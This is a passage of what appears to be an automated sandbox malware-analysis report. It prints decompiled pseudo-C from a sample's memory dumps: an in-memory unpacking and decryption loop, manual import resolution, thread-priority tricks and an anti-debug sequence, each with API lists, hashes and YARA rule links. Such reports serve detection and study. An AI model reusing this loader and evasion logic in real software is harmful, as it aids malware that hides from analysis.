						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x3ed5137; // 0x3ed5137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E03ED1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x3ed41cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x03ed15aa
0x03ed15ba
0x03ed15c1
0x03ed15c4
0x03ed15d9
0x03ed15e0
0x03ed15e5
0x03ed15f6
0x03ed15f9
0x03ed1601
0x03ed1604
0x03ed16ae
0x03ed160a
0x03ed160a
0x03ed160e
0x03ed1676
0x03ed1610
0x03ed1610
0x03ed1613
0x03ed1615
0x03ed161d
0x03ed1620
0x03ed1623
0x03ed162b
0x03ed1633
0x03ed1634
0x03ed1635
0x03ed163c
0x03ed163c
0x03ed1650
0x03ed1655
0x03ed165e
0x03ed1665
0x03ed1668
0x03ed166c
0x03ed1671
0x00000000
0x00000000
0x03ed1628
0x03ed1628
0x03ed1673
0x03ed1680
0x03ed1695
0x03ed1682
0x03ed168b
0x03ed1690
0x03ed16a6
0x03ed16a6
0x03ed16b5
0x03ed16bb

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 03ED15F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,03ED17EC), ref: 03ED168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 03ED16A6

Strings

Mar 26 2021, xrefs: 03ED162B

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 110f64843bacaa975bb83657f3ada43ccff577a9b07330dde6f9f2e3df59d378
Instruction ID: 99fbe263f75542f329a1ce3bfa07e03550a048b7bf67fe0ebd3669860d429076
Opcode Fuzzy Hash: 110f64843bacaa975bb83657f3ada43ccff577a9b07330dde6f9f2e3df59d378
Instruction Fuzzy Hash: E9316175E0021DAFCB40DF99D980BEEF7B9FF48304F188269D515AB244D771AA068F90

Uniqueness

Uniqueness Score: -1.00%

Function 03ED1D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E03ED1D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E03ED17A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x03ed1d3b
0x03ed1d40
0x03ed1d4e
0x03ed1d53
0x03ed1d53
0x03ed1d59
0x03ed1d5e
0x03ed1d62
0x03ed1d66
0x03ed1d66
0x03ed1d70
0x03ed1d79

APIs

GetCurrentThread.KERNEL32 ref: 03ED1D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 03ED1D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 03ED1D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 03ED1D66

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 91380533642b19f6336c815628d84fe0c6990c0d60d91a3af3fd0031c6b57b38
Instruction ID: 27bc08d2d91b9bd5ca34a46ab42f95c866e6c6a0e32d8ee70d95948719533f84
Opcode Fuzzy Hash: 91380533642b19f6336c815628d84fe0c6990c0d60d91a3af3fd0031c6b57b38
Instruction Fuzzy Hash: 46E092353063206BE3127A2A6C88F6BAB5CEF922367150335F524D21D4DB548C1689A6

Uniqueness

Uniqueness Score: -1.00%

Function 03EE9447, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,03EE3AF1,00000001), ref: 03EE9458
HeapDestroy.KERNEL32 ref: 03EE948E

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: aa0587374c488e611d0b122c0188348b5c83a55283f2b70fb68d36225924862d
Instruction ID: 8f36ff5e44460c432ca4faa6e9f12f9890b1d01ed466feb2278070179e411bd7
Opcode Fuzzy Hash: aa0587374c488e611d0b122c0188348b5c83a55283f2b70fb68d36225924862d
Instruction Fuzzy Hash: FFE06DBA790302EADB21EF71BE44B2536E8EB8474AF005575F515E5085E77C94408E01

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03EECCD5, Relevance: 66.4, APIs: 44, Instructions: 431COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 03EECD0A
___getlocaleinfo.LIBCMT ref: 03EECD1F
___getlocaleinfo.LIBCMT ref: 03EECD34
___getlocaleinfo.LIBCMT ref: 03EECD49
___getlocaleinfo.LIBCMT ref: 03EECD61
___getlocaleinfo.LIBCMT ref: 03EECD76
___getlocaleinfo.LIBCMT ref: 03EECD88
___getlocaleinfo.LIBCMT ref: 03EECD9D
___getlocaleinfo.LIBCMT ref: 03EECDB5
___getlocaleinfo.LIBCMT ref: 03EECDCA

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: f85050cfc3fa4117e2ddb9e1b8cd0f5b27e7051b377b55f43499e3c466b91e9e
Instruction ID: 00cee7ecc199f34f13d2ffcb0fae175b91b7dc07d660f3085ace82879acf4549
Opcode Fuzzy Hash: f85050cfc3fa4117e2ddb9e1b8cd0f5b27e7051b377b55f43499e3c466b91e9e
Instruction Fuzzy Hash: B3E1BEB290020EBEEF11DBF1CC84EFF77BDEB14744F05096AB255E6040EAB5AA059764

Uniqueness

Uniqueness Score: -1.00%

Function 03EED879, Relevance: 18.3, APIs: 12, Instructions: 290COMMON

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 03EED8C6

Part of subcall function 03EF66E4: ___crtGetLocaleInfoA.LIBCMT ref: 03EF672A
Part of subcall function 03EF66E4: GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 03EF6738
Part of subcall function 03EF66E4: ___crtGetLocaleInfoA.LIBCMT ref: 03EF674F
Part of subcall function 03EF66E4: __calloc_crt.LIBCMT ref: 03EF6763
Part of subcall function 03EF66E4: ___crtGetLocaleInfoA.LIBCMT ref: 03EF6781
Part of subcall function 03EF66E4: __calloc_crt.LIBCMT ref: 03EF6792

__malloc_crt.LIBCMT ref: 03EED8D8
__calloc_crt.LIBCMT ref: 03EED8E8
__calloc_crt.LIBCMT ref: 03EED8F3
__calloc_crt.LIBCMT ref: 03EED8FE
__calloc_crt.LIBCMT ref: 03EED90D
GetCPInfo.KERNEL32(?,?), ref: 03EED960
___crtGetStringTypeA.LIBCMT ref: 03EED9CD
___crtLCMapStringA.LIBCMT ref: 03EEDA00
___crtLCMapStringA.LIBCMT ref: 03EEDA2D

Part of subcall function 03EFCB4E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03EFCB5A
Part of subcall function 03EFCB4E: __crtLCMapStringA_stat.LIBCMT ref: 03EFCB7A

InterlockedDecrement.KERNEL32(?), ref: 03EEDAFF
InterlockedDecrement.KERNEL32(03F44190), ref: 03EEDBC7

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: ___crt__calloc_crt$Locale$InfoString$DecrementInterlocked$A_statErrorLastTypeUpdateUpdate::____getlocaleinfo__crt__malloc_crt
String ID:
API String ID: 2672922395-0
Opcode ID: 82f83b4837d2560835af70fdca14fb7934f2748c9bcee6e1b664b0407e07e7cc
Instruction ID: 51a50c2eda4114db080ce85b695c813f0d5911440353f6ebaf8fc129365b59d5
Opcode Fuzzy Hash: 82f83b4837d2560835af70fdca14fb7934f2748c9bcee6e1b664b0407e07e7cc
Instruction Fuzzy Hash: 05B168B5D003499FDF10DFA9CC80BEEBBB9FF08304F185669E595AB240E675A945CB20

Uniqueness

Uniqueness Score: -1.00%

Function 03EE39FC, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 03EEB4E5
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03EEB4FA
UnhandledExceptionFilter.KERNEL32(03F3E580), ref: 03EEB505
GetCurrentProcess.KERNEL32(C0000409), ref: 03EEB521
TerminateProcess.KERNEL32(00000000), ref: 03EEB528

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: de4951ae9489f8253350bba079521e6184451ca49b763094af6869cadb3b24e5
Instruction ID: bc62788c3f89152ddac6e5bdad76097cc6a36df66d442a4fff7452cf33c40d11
Opcode Fuzzy Hash: de4951ae9489f8253350bba079521e6184451ca49b763094af6869cadb3b24e5
Instruction Fuzzy Hash: 1421CEFDA842089FD711EF69E348A587BB4FBD8308F10502AE618A7651E7BC5980CF51

Uniqueness

Uniqueness Score: -1.00%

Function 03ED146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03ED146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x3ed41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x3ed41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x3ed41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x3ed41a8 = _t5;
					 *0x3ed41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x3ed41a4 = _t6;
					if(_t6 == 0) {
						 *0x3ed41a4 =  *0x3ed41a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x03ed146d
0x03ed147b
0x03ed1483
0x03ed1488
0x03ed14d2
0x03ed14d2
0x03ed148a
0x03ed1492
0x03ed14ce
0x03ed14d0
0x03ed1494
0x03ed1494
0x03ed1499
0x03ed14a7
0x03ed14ac
0x03ed14b2
0x03ed14ba
0x03ed14bf
0x03ed14c1
0x03ed14c1
0x03ed14cb
0x03ed14cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,03ED17B8,747863F0,00000000), ref: 03ED147B
GetVersion.KERNEL32 ref: 03ED148A
GetCurrentProcessId.KERNEL32 ref: 03ED1499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03ED14B2

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 3f02c4ae278a9201b5aa63d205e79379488b854f85862be1d652639ddac19f76
Instruction ID: 4e2f59e50396f619a6e1d51ca836df6eeff11eef8030efba9da464dee1670bdb
Opcode Fuzzy Hash: 3f02c4ae278a9201b5aa63d205e79379488b854f85862be1d652639ddac19f76
Instruction Fuzzy Hash: 57F09A70646230AFE790BF6BBC0A7453BE4BB25B11F08431AF185DA0C8DBB040628F05

Uniqueness

Uniqueness Score: -1.00%

Function 03ED1566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E03ED1566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x03ed156a
0x03ed157b
0x03ed1583
0x03ed1585
0x03ed1598
0x03ed1598
0x03ed15a2

APIs

GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,03ED1C5E,?,03ED1810,?,00000000,00000000,?,?,?,03ED1810), ref: 03ED157B
GetSystemDefaultUILanguage.KERNEL32(?,?,03ED1C5E,?,03ED1810,?,00000000,00000000,?,?,?,03ED1810), ref: 03ED1585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,03ED1C5E,?,03ED1810,?,00000000,00000000,?,?,?,03ED1810), ref: 03ED1598

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: c5879957a99367239ab5bd6ab277675f4a22e14d15d14a193c34eb1488d7f925
Instruction ID: 598975e83c142ace2be1cd443b8f23232048f33c533874fac92d30712f5713d0
Opcode Fuzzy Hash: c5879957a99367239ab5bd6ab277675f4a22e14d15d14a193c34eb1488d7f925
Instruction Fuzzy Hash: BDE04FAC640208F6EB10E7A2AD06FBD72BCAB0070AF500184FB41E60C0D6B49A05A726

Uniqueness

Uniqueness Score: -1.00%

Function 03ED1F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03ED1F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x3ed41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x03ed1f31
0x03ed1f3a
0x03ed1f3f
0x03ed1f45
0x03ed1f4e
0x03ed1f54
0x03ed1f56
0x03ed1f59
0x03ed1f5e
0x03ed1f65
0x03ed1f65
0x03ed1f69
0x03ed1f71
0x03ed1f74
0x00000000
0x00000000
0x03ed1f7a
0x03ed1f84
0x03ed1f86
0x03ed1f89
0x03ed1f8c
0x03ed1f90
0x03ed1f98
0x03ed1f9a
0x03ed1f9d
0x03ed2005
0x03ed2005
0x03ed2009
0x00000000
0x00000000
0x03ed1fa2
0x03ed1fa8
0x03ed1faa
0x03ed1fbd
0x03ed1fc0
0x03ed1fc0
0x03ed1fc0
0x03ed1fc4
0x03ed1fac
0x03ed1fac
0x03ed1fb4
0x03ed1fb6
0x00000000
0x00000000
0x00000000
0x00000000
0x03ed1fb6
0x03ed1fa4
0x03ed1fa4
0x03ed1fb8
0x03ed1fb8
0x03ed1fb8
0x03ed1fc7
0x03ed1fca
0x03ed1fcc
0x03ed1fd3
0x03ed1fce
0x03ed1fce
0x03ed1fce
0x03ed1fdb
0x03ed1fe1
0x03ed1fe3
0x03ed2013
0x03ed1fe5
0x03ed1fe5
0x03ed1fe8
0x03ed1fea
0x03ed1ff2
0x03ed1ff2
0x03ed1ff7
0x03ed1ff9
0x03ed2000
0x03ed2002
0x03ed2002
0x03ed2002
0x00000000
0x03ed2002
0x00000000
0x03ed1fe3
0x03ed1f92
0x03ed1f94
0x03ed1f96
0x00000000
0x00000000
0x03ed1f96
0x03ed2016
0x03ed2016
0x03ed201d
0x03ed2022
0x00000000
0x00000000
0x03ed2028
0x03ed2033
0x00000000
0x03ed2033
0x03ed202a
0x03ed202a
0x03ed2030
0x00000000
0x03ed2030
0x03ed1f5e
0x03ed2034
0x03ed2039

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 03ED1F69
GetProcAddress.KERNEL32(?,00000000), ref: 03ED1FDB

Memory Dump Source

Source File: 00000008.00000002.596456288.0000000003ED1000.00000020.00020000.sdmp, Offset: 03ED0000, based on PE: true

Associated: 00000008.00000002.596445184.0000000003ED0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596471290.0000000003ED3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.596487361.0000000003ED5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.596497555.0000000003ED6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: a5e124a3255c47a493f18ac76b9afa17f7d78056c13a3418367edcaec31f56db
Instruction ID: 3344ee15627b4668abacfc6caafcf9f5d553b7404f3be68d39071e32d11e4586
Opcode Fuzzy Hash: a5e124a3255c47a493f18ac76b9afa17f7d78056c13a3418367edcaec31f56db
Instruction Fuzzy Hash: 06313771A0021ADFDB54CF59D880BAEF7F9BF44348B1856A9E941EB281E770DA42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03EECC83, Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

__decode_pointer.LIBCMT ref: 03EECC91
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03EECC98

Memory Dump Source

Source File: 00000008.00000002.596525604.0000000003EDF000.00000020.00020000.sdmp, Offset: 03EDF000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 3341406909-0
Opcode ID: d69524136895ec863eaeff212313c68f599fb40f7fc8852a18c7b0c996a28614
Instruction ID: 228f8c9de442b71781e7faf7ce783c11d80ac30e53de32d97838bed58ffb5214
Opcode Fuzzy Hash: d69524136895ec863eaeff212313c68f599fb40f7fc8852a18c7b0c996a28614
Instruction Fuzzy Hash: 5AC08CC95883884EFF01ABB8A48C3087A04EB81829F9044ACCC40B4041C69E9041CF21

Uniqueness

Uniqueness Score: -1.00%

Function 03ED2485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03ED2485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x3ed41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x3ed4240 = 1;
										__eflags =  *0x3ed4240;
										if( *0x3ed4240 != 0) {
											goto L60;
										}
										_t84 =  *0x3ed41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x3ed4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x3ed41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x3ed4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x3ed41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x3ed4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x3ed4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x3ed4240 = 1;
							__eflags =  *0x3ed4240;
							if( *0x3ed4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x3ed4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x3ed4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x3ed4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x3ed4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x3ed41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x3ed4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x3ed4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
